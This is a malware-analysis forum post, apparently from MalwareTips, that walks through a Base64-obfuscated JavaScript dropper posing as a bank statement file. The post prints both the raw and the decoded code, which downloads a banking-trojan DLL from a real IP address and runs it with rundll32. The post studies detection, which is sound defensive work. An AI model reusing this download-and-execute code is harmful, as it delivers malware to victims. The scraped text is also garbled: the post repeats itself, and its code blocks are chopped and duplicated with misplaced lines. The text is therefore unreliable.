https://malwaretips.com/threads/5-8-16-8.62027/
(Thanks to @Solarquest for the "cookies"
)
There are several scripted files in this zipped archive : .vbs, .js
I will post here some analysis for "very badly" obfuscated files.
=> It could be interesting to see why some of them are easily detected by AV/security tools
Some analysis will be very quick because some samples use very "simple" methods
I will certainly end this thread with the "less easy" obfuscated script.
(1) PROTESTOBR-EXTRATO.js
8 / 54
Antivirus scan for 2473516d45ca982d828e983086932fe615b7aabfc0852dfb65447c3e46cd3dc5 at 2016-08-07 04:11:15 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...abfc0852dfb65447c3e46cd3dc5?environmentId=100
I modified the URL to avoid accidental clicks
When looking at this script, some functions seem a little complicated ... or not.
Have you seen the name of functions used ?
b64ToUint6
UTF8ArrToStr
base64DecToArr
the maker of this code is a sympathetic person: he gave the functions very explicit names :
=> easy to understand what they do :
b64ToUint6 => base64 character to 6-bit unsigned int
UTF8ArrToStr => UTF8 array to String
base64DecToArr => base64 (encoded) decoder to array
Easy to understand that they decode base64 encoded Strings
You can try with this online tool :
Base64 Decode and Encode - Online
"V1NjcmlwdC5zaGVsbA=="
"aHh4cDovLzIwMC45OC4xNDUuOTEvc3lzdGVtL0JBLTEuMC4wLjAvSVVwZGF0ZS5kbGw="
"QkEtMi4wLjAuMA=="
"JUxPQ0FMQVBQREFUQSU="
"XFxJVXBkYXRlLmRsbA=="
"TVNYTUwyLlhNTEhUVFA="
"R0VU"
"QURPREIuU3RyZWFt"
'UnVuZGxsMzIuZXhlICI='
'IixXaGl0ZUNvbSA='
=> "hxxp://200.98.145.91/system/BA-1.0.0.0/IUpdate.dll"
=> "BA-2.0.0.0"
=> "%LOCALAPPDATA%"
=> "\\IUpdate.dll"
=> "MSXML2.XMLHTTP"
=> "GET"
=> "ADODB.Stream"
=> 'Rundll32.exe "'
=> ''",WhiteCom '
Then we can completely remove the functions, and get the clear code :
(function() {
Conclusion :
- Only used one obfuscation method : Base64 encoded strings
- functions names : too easy to understand their purpose
- Zero difficulty : a change from other analyses I made of 'real' obfuscation methods
Payload : IUpdate.dll
From this family : HEUR:Trojan-Banker.Win32.Palibu.gen
Antivirus scan for 01f7815b9f99221f15ec306bf343a338f31584c16a0cc2f36e2901cbe7909809 at 2016-08-22 16:36:52 UTC - VirusTotal
Next part : aplicativo.vbs
(Thanks to @Solarquest for the "cookies"
There are several scripted files in this zipped archive : .vbs, .js
I will post here some analysis for "very badly" obfuscated files.
=> It could be interesting to see why some of them are easily detected by AV/security tools
Some analysis will be very quick because some samples use very "simple" methods
I will certainly end this thread with the "less easy" obfuscated script.
(1) PROTESTOBR-EXTRATO.js
8 / 54
Antivirus scan for 2473516d45ca982d828e983086932fe615b7aabfc0852dfb65447c3e46cd3dc5 at 2016-08-07 04:11:15 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...abfc0852dfb65447c3e46cd3dc5?environmentId=100
I modified the URL to avoid accidental clicks
function b64ToUint6 (nChr) {
function UTF8ArrToStr (aBytes) {
function base64DecToArr (sBase64, nBlocksSize) {
(function() {
return nChr > 64 &&
nChr < 91 ? nChr - 65: nChr > 96 &&
nChr < 123 ? nChr - 71: nChr > 47 &&
nChr < 58 ? nChr + 4: nChr === 43 ? 62 : nChr === 47 ? 63: 0;
}nChr < 91 ? nChr - 65: nChr > 96 &&
nChr < 123 ? nChr - 71: nChr > 47 &&
nChr < 58 ? nChr + 4: nChr === 43 ? 62 : nChr === 47 ? 63: 0;
function UTF8ArrToStr (aBytes) {
var sView = "";
for (var nPart, nLen = aBytes.length, nIdx = 0; nIdx < nLen; nIdx++) {
return sView;
}nPart = aBytes[nIdx];
sView += String.fromCharCode(
nPart > 251 && nPart < 254 && nIdx + 5 < nLen ?
(nPart - 252) * 1073741824 + (aBytes[++nIdx] - 128 << 24) + (aBytes[++nIdx] - 128 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 247 && nPart < 252 && nIdx + 4 < nLen ?
(nPart - 248 << 24) + (aBytes[++nIdx] - 128 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 239 && nPart < 248 && nIdx + 3 < nLen ?
(nPart - 240 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 223 && nPart < 240 && nIdx + 2 < nLen ?
(nPart - 224 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 191 && nPart < 224 && nIdx + 1 < nLen ?
(nPart - 192 << 6) + aBytes[++nIdx] - 128
: nPart
);
}sView += String.fromCharCode(
nPart > 251 && nPart < 254 && nIdx + 5 < nLen ?
(nPart - 252) * 1073741824 + (aBytes[++nIdx] - 128 << 24) + (aBytes[++nIdx] - 128 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 247 && nPart < 252 && nIdx + 4 < nLen ?
(nPart - 248 << 24) + (aBytes[++nIdx] - 128 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 239 && nPart < 248 && nIdx + 3 < nLen ?
(nPart - 240 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 223 && nPart < 240 && nIdx + 2 < nLen ?
(nPart - 224 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 191 && nPart < 224 && nIdx + 1 < nLen ?
(nPart - 192 << 6) + aBytes[++nIdx] - 128
: nPart
);
return sView;
function base64DecToArr (sBase64, nBlocksSize) {
var sB64Enc = sBase64.replace(/[^A-Za-z0-9\+\/]/g, ""), nInLen = sB64Enc.length,
nOutLen = nBlocksSize ? Math.ceil((nInLen * 3 + 1 >> 2) / nBlocksSize) * nBlocksSize : nInLen * 3 + 1 >> 2, taBytes = new Array(nOutLen);
for (var nMod3, nMod4, nUint24 = 0, nOutIdx = 0, nInIdx = 0; nInIdx < nInLen; nInIdx++) {
return taBytes;
}nOutLen = nBlocksSize ? Math.ceil((nInLen * 3 + 1 >> 2) / nBlocksSize) * nBlocksSize : nInLen * 3 + 1 >> 2, taBytes = new Array(nOutLen);
for (var nMod3, nMod4, nUint24 = 0, nOutIdx = 0, nInIdx = 0; nInIdx < nInLen; nInIdx++) {
nMod4 = nInIdx & 3;
nUint24 |= b64ToUint6(sB64Enc.charCodeAt(nInIdx)) << 18 - 6 * nMod4;
if (nMod4 === 3 || nInLen - nInIdx === 1) {
}
}nUint24 |= b64ToUint6(sB64Enc.charCodeAt(nInIdx)) << 18 - 6 * nMod4;
if (nMod4 === 3 || nInLen - nInIdx === 1) {
for (nMod3 = 0; nMod3 < 3 && nOutIdx < nOutLen; nMod3++, nOutIdx++) {
nUint24 = 0;taBytes[nOutIdx] = nUint24 >>> (16 >>> nMod3 & 24) & 255;
}}
return taBytes;
(function() {
var XXY = new ActiveXObject( UTF8ArrToStr(base64DecToArr("V1NjcmlwdC5zaGVsbA==")));
var eor = UTF8ArrToStr(
base64DecToArr("aHh4cDovLzIwMC45OC4xNDUuOTEvc3lzdGVtL0JBLTEuMC4wLjAvSVVwZGF0ZS5kbGw="))
var hWa = UTF8ArrToStr(base64DecToArr("QkEtMi4wLjAuMA=="))
var lFL = XXY.ExpandEnvironmentStrings( UTF8ArrToStr(base64DecToArr("JUxPQ0FMQVBQREFUQSU="))) + UTF8ArrToStr(base64DecToArr("XFxJVXBkYXRlLmRsbA=="))
var ont = new ActiveXObject( UTF8ArrToStr(base64DecToArr("TVNYTUwyLlhNTEhUVFA=")))
ont.open( UTF8ArrToStr(base64DecToArr("R0VU")), eor, false)
ont.send()
if (ont.Status == 200) {
})();var eor = UTF8ArrToStr(
base64DecToArr("aHh4cDovLzIwMC45OC4xNDUuOTEvc3lzdGVtL0JBLTEuMC4wLjAvSVVwZGF0ZS5kbGw="))
var hWa = UTF8ArrToStr(base64DecToArr("QkEtMi4wLjAuMA=="))
var lFL = XXY.ExpandEnvironmentStrings( UTF8ArrToStr(base64DecToArr("JUxPQ0FMQVBQREFUQSU="))) + UTF8ArrToStr(base64DecToArr("XFxJVXBkYXRlLmRsbA=="))
var ont = new ActiveXObject( UTF8ArrToStr(base64DecToArr("TVNYTUwyLlhNTEhUVFA=")))
ont.open( UTF8ArrToStr(base64DecToArr("R0VU")), eor, false)
ont.send()
if (ont.Status == 200) {
var sNu = new ActiveXObject( UTF8ArrToStr(base64DecToArr("QURPREIuU3RyZWFt")))
sNu.Open()
sNu.Type = 1
sNu.Write(ont.ResponseBody)
sNu.Position = 0
sNu.SaveToFile(lFL)
sNu.Close()
XXY.run( UTF8ArrToStr(base64DecToArr('UnVuZGxsMzIuZXhlICI=')) + lFL + UTF8ArrToStr(base64DecToArr('IixXaGl0ZUNvbSA=')) + hWa + ' high');
} sNu.Open()
sNu.Type = 1
sNu.Write(ont.ResponseBody)
sNu.Position = 0
sNu.SaveToFile(lFL)
sNu.Close()
XXY.run( UTF8ArrToStr(base64DecToArr('UnVuZGxsMzIuZXhlICI=')) + lFL + UTF8ArrToStr(base64DecToArr('IixXaGl0ZUNvbSA=')) + hWa + ' high');
Have you seen the name of functions used ?
b64ToUint6
UTF8ArrToStr
base64DecToArr
the maker of this code is a sympathetic person: he gave the functions very explicit names :
=> easy to understand what they do :
b64ToUint6 => base64 character to 6-bit unsigned int
UTF8ArrToStr => UTF8 array to String
base64DecToArr => base64 (encoded) decoder to array
Easy to understand that they decode base64 encoded Strings
You can try with this online tool :
Base64 Decode and Encode - Online
"V1NjcmlwdC5zaGVsbA=="
"aHh4cDovLzIwMC45OC4xNDUuOTEvc3lzdGVtL0JBLTEuMC4wLjAvSVVwZGF0ZS5kbGw="
"QkEtMi4wLjAuMA=="
"JUxPQ0FMQVBQREFUQSU="
"XFxJVXBkYXRlLmRsbA=="
"TVNYTUwyLlhNTEhUVFA="
"R0VU"
"QURPREIuU3RyZWFt"
'UnVuZGxsMzIuZXhlICI='
'IixXaGl0ZUNvbSA='
=> "WScript.shell"
=> "hxxp://200.98.145.91/system/BA-1.0.0.0/IUpdate.dll"
=> "BA-2.0.0.0"
=> "%LOCALAPPDATA%"
=> "\\IUpdate.dll"
=> "MSXML2.XMLHTTP"
=> "GET"
=> "ADODB.Stream"
=> 'Rundll32.exe "'
=> ''",WhiteCom '
Then we can completely remove the functions, and get the clear code :
(function() {
var WS= new ActiveXObject( "WScript.shell");
var url= "hxxp://200.98.145.91/system/BA-1.0.0.0/IUpdate.dll";
var hWa = "BA-2.0.0.0";
var file_path= WS.ExpandEnvironmentStrings( "%LOCALAPPDATA%" + "\\IUpdate.dll" );
var http = new ActiveXObject( "MSXML2.XMLHTTP");
http.open("GET", url, false);
http.send();
if (http.Status == 200) { // request ok
})();var url= "hxxp://200.98.145.91/system/BA-1.0.0.0/IUpdate.dll";
var hWa = "BA-2.0.0.0";
var file_path= WS.ExpandEnvironmentStrings( "%LOCALAPPDATA%" + "\\IUpdate.dll" );
var http = new ActiveXObject( "MSXML2.XMLHTTP");
http.open("GET", url, false);
http.send();
if (http.Status == 200) { // request ok
var stream= new ActiveXObject("ADODB.Stream");
// uses this object to retrieve data from request and store it in a file
stream.Open();
stream.Type = 1 ;
stream.Write(stream.ResponseBody);
stream.Position = 0 ;
stream.SaveToFile(file_path);
stream.Close()
WS.run( '"rundll32.exe " + file_path + ",WhiteCom '"+ "BA-2.0.0.0" + " high");
//ex : rundll32.exe "C:\Users\DardiM\AppData\Local\ IUpdate.dll", WhiteCom BA-2.0.0.0 high
} // uses this object to retrieve data from request and store it in a file
stream.Open();
stream.Type = 1 ;
stream.Write(stream.ResponseBody);
stream.Position = 0 ;
stream.SaveToFile(file_path);
stream.Close()
WS.run( '"rundll32.exe " + file_path + ",WhiteCom '"+ "BA-2.0.0.0" + " high");
//ex : rundll32.exe "C:\Users\DardiM\AppData\Local\ IUpdate.dll", WhiteCom BA-2.0.0.0 high
Conclusion :
- Only used one obfuscation method : Base64 encoded strings
- functions names : too easy to understand their purpose
- Zero difficulty : a change from other analyses I made of 'real' obfuscation methods
Payload : IUpdate.dll
From this family : HEUR:Trojan-Banker.Win32.Palibu.gen
Antivirus scan for 01f7815b9f99221f15ec306bf343a338f31584c16a0cc2f36e2901cbe7909809 at 2016-08-22 16:36:52 UTC - VirusTotal
Next part : aplicativo.vbs
=> bad obfuscation methods, but some elaborate functions